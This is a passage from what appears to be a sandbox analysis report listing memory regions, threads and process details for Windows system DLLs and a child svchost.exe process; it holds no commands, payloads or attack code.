"\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5425 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5426 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5427 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5428 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 5429 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5430 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5431 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5432 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5433 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5434 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5435 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5436 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5437 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5438 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5439 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5440 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5441 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5442 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5443 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5444 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5445 start_va = 0x7ffaf7180000 end_va = 0x7ffaf7187fff entry_point = 0x7ffaf7180000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 5446 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5447 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5448 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5449 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5450 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5451 start_va = 0x7ffaf7690000 end_va = 0x7ffaf7854fff entry_point = 0x7ffaf7690000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 5452 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5453 start_va = 0x7ffaf7920000 end_va = 0x7ffaf7926fff entry_point = 0x7ffaf7920000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 5454 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 570 os_tid = 0x7a0 Thread: id = 571 os_tid = 0x784 Thread: id = 572 os_tid = 0x780 Thread: id = 573 os_tid = 0x770 Thread: id = 574 os_tid = 0x764 Thread: id = 575 os_tid = 0x750 Thread: id = 576 os_tid = 0x718 Thread: id = 577 os_tid = 0x6cc Thread: id = 578 os_tid = 0x6ac Thread: id = 579 os_tid = 0x664 Thread: id = 580 os_tid = 0x640 Thread: id = 581 os_tid = 0x634 Thread: id = 582 os_tid = 0x62c Thread: id = 583 os_tid = 0x61c Thread: id = 584 os_tid = 0x5bc Thread: id = 585 os_tid = 0x4d4 Process: id = "52" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x11d8a000" os_pid = "0x5e0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xa], "NT SERVICE\\tiledatamodelsvc" [0xe], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00015906" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5583 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5584 start_va = 0xf398940000 end_va = 0xf39894ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398940000" filename = "" Region: id = 5585 start_va = 0xf398950000 end_va = 0xf398950fff entry_point = 0xf398950000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 5586 start_va = 0xf398960000 end_va = 0xf398973fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398960000" filename = "" Region: id = 5587 start_va = 0xf398980000 end_va = 0xf3989fffff entry_point = 0x0 region_type = private name = "private_0x000000f398980000" filename = "" Region: id = 5588 start_va = 0xf398a00000 end_va = 0xf398a03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398a00000" filename = "" Region: id = 5589 start_va = 0xf398a10000 end_va = 0xf398a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398a10000" filename = "" Region: id = 5590 start_va = 0xf398a20000 end_va = 0xf398a21fff entry_point = 0x0 region_type = private name = "private_0x000000f398a20000" filename = "" Region: id = 5591 start_va = 0xf398a30000 end_va = 0xf398aedfff entry_point = 0xf398a30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5592 start_va = 0xf398af0000 end_va = 0xf398afffff entry_point = 0xf398af0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5593 start_va = 0xf398b00000 end_va = 0xf398b0ffff entry_point = 0xf398b00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5594 start_va = 0xf398b10000 end_va = 0xf398b1ffff entry_point = 0xf398b10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5595 start_va = 0xf398b20000 end_va = 0xf398b2ffff entry_point = 0xf398b20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5596 start_va = 0xf398b30000 end_va = 0xf398b3ffff entry_point = 0xf398b30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5597 start_va = 0xf398b40000 end_va = 0xf398b4ffff entry_point = 0xf398b40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5598 start_va = 0xf398b70000 end_va = 0xf398b70fff entry_point = 0x0 region_type = private name = "private_0x000000f398b70000" filename = "" Region: id = 5599 start_va = 0xf398b80000 end_va = 0xf398b80fff entry_point = 0x0 region_type = private name = "private_0x000000f398b80000" filename = "" Region: id = 5600 start_va = 0xf398b90000 end_va = 0xf398b90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398b90000" filename = "" Region: id = 5601 start_va = 0xf398ba0000 end_va = 0xf398baffff entry_point = 0xf398ba0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5602 start_va = 0xf398bb0000 end_va = 0xf398bb7fff entry_point = 0xf398bb0000 region_type = mapped_file name = "staterepository-machine.srd-shm" filename = "\\ProgramData\\Microsoft\\Windows\\AppRepository\\StateRepository-Machine.srd-shm" (normalized: "c:\\programdata\\microsoft\\windows\\apprepository\\staterepository-machine.srd-shm") Region: id = 5603 start_va = 0xf398bc0000 end_va = 0xf398bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398bc0000" filename = "" Region: id = 5604 start_va = 0xf398bd0000 end_va = 0xf398bd0fff entry_point = 0x0 region_type = private name = "private_0x000000f398bd0000" filename = "" Region: id = 5605 start_va = 0xf398be0000 end_va = 0xf398be0fff entry_point = 0x0 region_type = private name = "private_0x000000f398be0000" filename = "" Region: id = 5606 start_va = 0xf398bf0000 end_va = 0xf398bf6fff entry_point = 0x0 region_type = private name = "private_0x000000f398bf0000" filename = "" Region: id = 5607 start_va = 0xf398c00000 end_va = 0xf398cfffff entry_point = 0x0 region_type = private name = "private_0x000000f398c00000" filename = "" Region: id = 5608 start_va = 0xf398d00000 end_va = 0xf398e87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f398d00000" filename = "" Region: id = 5609 start_va = 0xf398e90000 end_va = 0xf398e90fff entry_point = 0x0 region_type = private name = "private_0x000000f398e90000" filename = "" Region: id = 5610 start_va = 0xf398ea0000 end_va = 0xf398ea0fff entry_point = 0x0 region_type = private name = "private_0x000000f398ea0000" filename = "" Region: id = 5611 start_va = 0xf398eb0000 end_va = 0xf398eb0fff entry_point = 0x0 region_type = private name = "private_0x000000f398eb0000" filename = "" Region: id = 5612 start_va = 0xf398ec0000 end_va = 0xf398ec6fff entry_point = 0x0 region_type = private name = "private_0x000000f398ec0000" filename = "" Region: id = 5613 start_va = 0xf398ed0000 end_va = 0xf398ed3fff entry_point = 0x0 region_type = private name = "private_0x000000f398ed0000" filename = "" Region: id = 5614 start_va = 0xf398ee0000 end_va = 0xf398ee1fff entry_point = 0x0 region_type = private name = "private_0x000000f398ee0000" filename = "" Region: id = 5615 start_va = 0xf398ef0000 end_va = 0xf398ef0fff entry_point = 0x0 region_type = private name = "private_0x000000f398ef0000" filename = "" Region: id = 5616 start_va = 0xf398f00000 end_va = 0xf398ffffff entry_point = 0x0 region_type = private name = "private_0x000000f398f00000" filename = "" Region: id = 5617 start_va = 0xf399000000 end_va = 0xf399180fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399000000" filename = "" Region: id = 5618 start_va = 0xf399190000 end_va = 0xf39924ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399190000" filename = "" Region: id = 5619 start_va = 0xf399350000 end_va = 0xf39944ffff entry_point = 0x0 region_type = private name = "private_0x000000f399350000" filename = "" Region: id = 5620 start_va = 0xf399450000 end_va = 0xf399786fff entry_point = 0xf399450000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5621 start_va = 0xf399990000 end_va = 0xf399a8ffff entry_point = 0x0 region_type = private name = "private_0x000000f399990000" filename = "" Region: id = 5622 start_va = 0xf399b90000 end_va = 0xf399b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399b90000" filename = "" Region: id = 5623 start_va = 0xf399ba0000 end_va = 0xf399baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399ba0000" filename = "" Region: id = 5624 start_va = 0xf399bb0000 end_va = 0xf399bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399bb0000" filename = "" Region: id = 5625 start_va = 0xf399bc0000 end_va = 0xf399bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399bc0000" filename = "" Region: id = 5626 start_va = 0xf399bd0000 end_va = 0xf399bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399bd0000" filename = "" Region: id = 5627 start_va = 0xf399be0000 end_va = 0xf399beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399be0000" filename = "" Region: id = 5628 start_va = 0xf399bf0000 end_va = 0xf399bfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399bf0000" filename = "" Region: id = 5629 start_va = 0xf399c00000 end_va = 0xf399c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f399c00000" filename = "" Region: id = 5630 start_va = 0xf399c10000 end_va = 0xf39ac0ffff entry_point = 0x0 region_type = private name = "private_0x000000f399c10000" filename = "" Region: id = 5631 start_va = 0xf39ac10000 end_va = 0xf39ac2ffff entry_point = 0x0 region_type = private name = "private_0x000000f39ac10000" filename = "" Region: id = 5632 start_va = 0xf39ac30000 end_va = 0xf3aac2ffff entry_point = 0x0 region_type = private name = "private_0x000000f39ac30000" filename = "" Region: id = 5633 start_va = 0xf3aac30000 end_va = 0xf3bac2ffff entry_point = 0x0 region_type = private name = "private_0x000000f3aac30000" filename = "" Region: id = 5634 start_va = 0xf3bac30000 end_va = 0xf3bac30fff entry_point = 0x0 region_type = private name = "private_0x000000f3bac30000" filename = "" Region: id = 5635 start_va = 0xf3bac40000 end_va = 0xf3bac4ffff entry_point = 0xf3bac40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5636 start_va = 0xf3bac50000 end_va = 0xf3bac5ffff entry_point = 0xf3bac50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5637 start_va = 0xf3bac60000 end_va = 0xf3bac6ffff entry_point = 0xf3bac60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5638 start_va = 0xf3bac70000 end_va = 0xf3bac7ffff entry_point = 0xf3bac70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5639 start_va = 0xf3bace0000 end_va = 0xf3baceffff entry_point = 0xf3bace0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5640 start_va = 0xf3bacf0000 end_va = 0xf3bacfffff entry_point = 0xf3bacf0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5641 start_va = 0xf3bad00000 end_va = 0xf3bad0ffff entry_point = 0xf3bad00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5642 start_va = 0xf3bad10000 end_va = 0xf3bad1ffff entry_point = 0xf3bad10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5643 start_va = 0xf3bad20000 end_va = 0xf3bad2ffff entry_point = 0xf3bad20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5644 start_va = 0xf3bad30000 end_va = 0xf3badaffff entry_point = 0x0 region_type = private name = "private_0x000000f3bad30000" filename = "" Region: id = 5645 start_va = 0xf3badb0000 end_va = 0xf3badbffff entry_point = 0xf3badb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5646 start_va = 0xf3badc0000 end_va = 0xf3badc0fff entry_point = 0x0 region_type = private name = "private_0x000000f3badc0000" filename = "" Region: id = 5647 start_va = 0xf3badd0000 end_va = 0xf3baddffff entry_point = 0xf3badd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5648 start_va = 0xf3bade0000 end_va = 0xf3badeffff entry_point = 0xf3bade0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5649 start_va = 0xf3badf0000 end_va = 0xf3badfffff entry_point = 0xf3badf0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5650 start_va = 0xf3bae00000 end_va = 0xf3bae0ffff entry_point = 0xf3bae00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5651 start_va = 0xf3bae10000 end_va = 0xf3bae1ffff entry_point = 0xf3bae10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5652 start_va = 0xf3bae20000 end_va = 0xf3bae2ffff entry_point = 0xf3bae20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5653 start_va = 0xf3bae30000 end_va = 0xf3bae3ffff entry_point = 0xf3bae30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5654 start_va = 0xf3bae40000 end_va = 0xf3bae4ffff entry_point = 0xf3bae40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5655 start_va = 0xf3bae50000 end_va = 0xf3bae5ffff entry_point = 0xf3bae50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5656 start_va = 0xf3bae60000 end_va = 0xf3bae6ffff entry_point = 0xf3bae60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5657 start_va = 0xf3bae70000 end_va = 0xf3bae7ffff entry_point = 0xf3bae70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5658 start_va = 0xf3bae80000 end_va = 0xf3bae8ffff entry_point = 0xf3bae80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5659 start_va = 0xf3bae90000 end_va = 0xf3bae9ffff entry_point = 0xf3bae90000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5660 start_va = 0xf3baea0000 end_va = 0xf3baeaffff entry_point = 0xf3baea0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5661 start_va = 0xf3baeb0000 end_va = 0xf3baebffff entry_point = 0xf3baeb0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5662 start_va = 0xf3baec0000 end_va = 0xf3baecffff entry_point = 0xf3baec0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5663 start_va = 0xf3baed0000 end_va = 0xf3baedffff entry_point = 0xf3baed0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5664 start_va = 0xf3baee0000 end_va = 0xf3baeeffff entry_point = 0xf3baee0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: 